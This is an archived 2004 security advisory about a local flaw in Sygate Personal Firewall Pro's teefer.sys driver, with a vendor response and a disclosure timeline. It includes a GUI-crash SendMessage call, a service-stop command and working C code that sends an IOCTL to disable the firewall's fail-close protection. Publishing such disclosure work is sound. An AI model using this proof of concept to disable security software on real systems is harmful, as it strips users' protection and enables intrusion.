Sygate Personal Firewall Pro version 5.x is susceptible to a denial of service attack by being crashed via unprivileged applications sending specially crafted messages to the ListView control in the GUI.
c4b523beea4596ecf960bcae931886280975333d872f47098e91d7d4f0b32445<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>SIG^2 G-TEC - Sygate Personal Firewall PRO's Driver May be Disabled Locally by Malicious Programs</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Sygate Personal Firewall PRO's Driver May be Disabled Locally by Malicious Programs">
<meta name="keywords" content="Sygate, Personal, Firewall, Disabled">
<link href="spfp_files/main.css" rel="stylesheet" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script></head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="MM_preloadImages('../img/nv_login2.gif','../img/nv_g-tec2.gif','../img/nv_cc2.gif','../img/nv_mirror2.gif','../img/nv_contact2.gif','../img/nv_sponsors2.gif','../img/nv_news2.gif','../img/nv_abtus2.gif','../img/nv_obj2.gif','../img/nv_pastevents2.gif','../img/nv_forums2.gif','../img/nv_links2.gif')">
<table border=0>
<td>
<span class="headertext">SIG^2 Vulnerability Research Advisory</span>
<p>
<span class="headertext"><h1>Sygate Personal Firewall PRO's Driver May be Disabled Locally by Malicious Programs</h1></span>
by Tan Chew Keong<br>
Release Date: 13 June 2004
</p><p>
<span class="headertext">Summary</span><br>
<br>
<a href="http://soho.sygate.com/products/spf_pro.htm">Sygate Personal Firewall PRO</a>
(SPFP) has redefined the personal firewall market with
a multi-layered shield of network, content, application, and operating system security.
Sygate Personal Firewall Pro protects your system from intrusions designed to exploit
vulnerabilities in Internet and Intranet communication. It is the ultimate desktop
security solution trusted by professionals and relied upon by millions of users.
</p><p>
SPFP has a fail-close feature that can be enabled to block all traffic when the
firewall service is not enabled. Hence, if a malicious program kills the firewall
service (smc.exe), all traffic will be blocked. However, a flaw in SPFP's driver
implementation may be exploited locally to disable this protection.
</p><p> <br>
<span class="headertext">Tested System</span><br>
<br>
Sygate Personal Firewall PRO 5.5 Build 2525 on Win2k SP4
</p><p> <br>
<span class="headertext">Details</span><br>
<br>
SPFP has a fail-close feature that can be enabled to block all traffic when the
firewall service is not enabled. Hence, if a malicious program kills the firewall
service (smc.exe), all traffic will be blocked. This feature may be enabled from
SPFP's GUI menu with the following sequence of commands.
(Tools->options->Security Tab->"Block all traffic while the service is not loaded").
</p><p>
SPFP is implemented as a user-space service (smc.exe), and as a kernel-space NDIS
intermediate driver (teefer.sys). The driver creates a device named
\\device\Teefer. The user-space service (smc.exe, tfman.dll) communicates with the
kernel-space driver through this device using specific Device I/O control codes.
</p><p>
The driver does not validate the source of the control codes, and hence, malicious
programs may send control codes to the driver to disable it's fail-close protection.
</p><p>
SPFP tries to prevent this by allowing only one user-space program to open it's
driver i.e. (Exclusive = TRUE when calling IoCreateDevice). Hence, as long as
smc.exe is running, other programs cannot open this driver. However, this may be
overcomed in the following two ways.
</p><p>
</p><ol>
<li>If the malicious program runs with Administrator privilege, it can simply stop smc.exe using<p>
</p><ol>
<li>net stop smcservice</li>
<li>or by using Service Control Manager APIs.</li>
</ol>
</li><p>
</p><li>If the malicious program runs with non-administrator privilege, smc.exe may be crashed by
exploiting the List-View Control in SPFP's GUI.<p>
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
</p></li></ol>
<br>
After stopping smc.exe, the fail-close protection may be disabled using the following code.
<p>
<xmp>
hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("Open failed\n");
}
else
{
printf("Device opened.\n");
char buffer[8];
DWORD *ptr = (DWORD *)buffer;
DWORD *ptr2 = (DWORD *)(buffer + 4);
DWORD ret;
*ptr = 0;
*ptr2 = 0;
if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8, &ret, 0))
printf("Sent.\n");
CloseHandle(hDevice);
}
</xmp>
</p><p> </p><p>
<span class="headertext">Vendor Response</span><br>
<br>
Vulnerability will be fixed in upcoming release with additional product engine
enhancements and performance tweaks.
</p><p> <br>
<span class="headertext">Disclosure Timeline</span><br>
<br>
20 May 04 - Vulnerability Discovered<br>
30 May 04 - Initial Vendor Notification (CASE ID:Pro-29-May-2004-20:45:17)<br>
08 Jun 04 - Initial Vendor Response<br>
13 Jun 04 - Public Release<br>
</p><p> </p>
<span class="headertext">Contacts</span><br>
<br>
For further questions and enquries, email them to the following.
<p>
Overall-in-charge: <a href="mailto:%63%68%65%77%6b%65%6f%6e%67%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67">Tan Chew Keong</a>
</p><p>
</p><p>
</p><p><br>
<span class="footnote">Updated: 13/6/2004</span><br>
<a href="mailto:%77%65%62%6D%61%73%74%65%72%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67" class="smallblackText">webmaster@security.org.sg</a></p>
</td>
<td width="30"><img src="spfp_files/spacer.gif" width="30" height="1"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
</tbody></table>
</body></html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed